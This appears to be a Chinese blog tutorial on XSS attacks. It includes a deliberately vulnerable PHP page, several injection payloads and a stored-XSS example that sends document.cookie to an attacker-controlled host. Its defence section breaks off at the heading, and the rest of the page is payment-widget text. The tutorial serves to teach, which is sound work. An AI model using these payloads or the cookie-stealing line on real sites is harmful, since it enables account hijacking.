WEB网站常见的攻击方法总结与原理分析

一个网站建立以后,如果不注意安全方面的问题,很容易被人攻击,下面就讨论一下几种常见的漏洞的简介与原理分析


一.跨站脚本攻击(xss)


       恶意攻击者通过往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。下面我们来分析一下xss的特点:

1、耗时间
2、有一定几率不成功
3、没有相应的软件来完成自动化攻击
4、前期需要基本的html、js功底,后期需要扎实的html、js、actionscript2/3.0等语言的功底
5、是一种被动的攻击手法
6、对website有http-only、crossdomian.xml没有用
但是这些并没有影响黑客对此漏洞的偏爱,原因不需要多,只需要一个。

Xss几乎每个网站都存在,google、baidu、360等都存在。

   

    下面来看一个例子:

<span style="font-size:14px;"><html>
<head>
    <meta http-equiv="Content-Type" content="text/html;charset="utf-8">
	<title>xss原理重现</title>
</head>
<body>
    <center>
	<h6>把我们输入的字符串 输出到input里的value属性里</h6>
    <form action=""  method="POST">
	<h6>请输入你想显现的字符串</h6>
	<input type="text" name="xss_input" value="输入"><br>
	<input type="submit">
	</form>
	<hr>
<?php
header("Content-Type:text/html;charset=utf-8");
$xss=$_POST['xss_input'];
if(isset($xss)){  
echo '<input type="text" value="'.$xss.'">';  
}else{  
echo '<input type="type" value="输出">';  
}  
?>
</center>
</body>
</html></span>
我们在输入框里输入  "><script>alert('xss')</script>

分析这一段的代码,前面的">是为了闭合前面的input,这个输入就可以使弹窗出现


我们也可以通过输入   " οnclick="alert('xss')
因为onclick是鼠标点击事件,也就是说当你的鼠标点击第二个input输入框的时候,
就会触发onclick事件,然后执行


Js可以干很多的事,可以获取cookies(对http-only没用)、控制用户的动作(发帖、私信什么的)等等。

比如我们在网站的留言区输入下面的代码:<script src="js_url"></script>
当管理员进后台浏览留言的时候,就会触发,然后管理员的cookies和后台地址还有管理员浏览器版本等等你都可以获取到了


那假如说网站禁止过滤了script 这时该怎么办呢,记住一句话,这是我总结出来的“xss就是在页面执行你想要的js”不用管那么多,只要能运行我们的js就OK,比如用img标签或者a标签。我们可以这样写
<img src=1 οnerrοr=alert('xss')>当找不到图片名为1的文件时,执行alert('xss')  
<a href=javascrip:alert('xss')>s</a> 点击s时运行alert('xss')  
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的src来弹窗


下面是XSS攻击方法:
Stored XSS

       Stored XSS是存储式XSS漏洞,由于其攻击代码已经存储到服务器上或者数据库中,所以受害者是很多人。

       场景二:

       a.com可以发文章,我登录后在a.com中发布了一篇文章,文章中包含了恶意代码,
       <script>window.open(“www.b.com?param=”+document.cookie)</script>,保存文章。
       这时Tom和Jack看到了我发布的文章,当在查看我的文章时就都中招了,
       他们的cookie信息都发送到了我的服务器上,攻击成功!这个过程中,受害者是多个人。
       Stored XSS漏洞危害性更大,危害面更广。
       
XSS防御方法:

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值